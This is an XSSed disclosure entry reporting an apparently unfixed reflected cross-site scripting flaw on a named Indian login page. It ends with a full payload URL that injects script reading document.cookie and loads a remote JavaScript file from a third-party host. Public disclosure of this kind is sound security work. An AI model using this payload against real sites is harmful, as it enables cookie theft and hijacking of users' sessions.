Unfixed XSS vulnerability at www.uhcindia.com

ID XSSED:63805
Type xssed
Reporter Rohit Bansal
Modified 2010-04-07T00:00:00


Security researcher Rohit Bansal, has submitted on 27/08/2009 a cross-site-scripting (XSS) vulnerability affecting www.uhcindia.com, which at the time of submission ranked 593011 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: https://www.uhcindia.com/Login.asp?var=%22%3E/r0hit/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cscript%20src=http://www.fashiongroup.com.mk/x.js%3E%3C/script%3E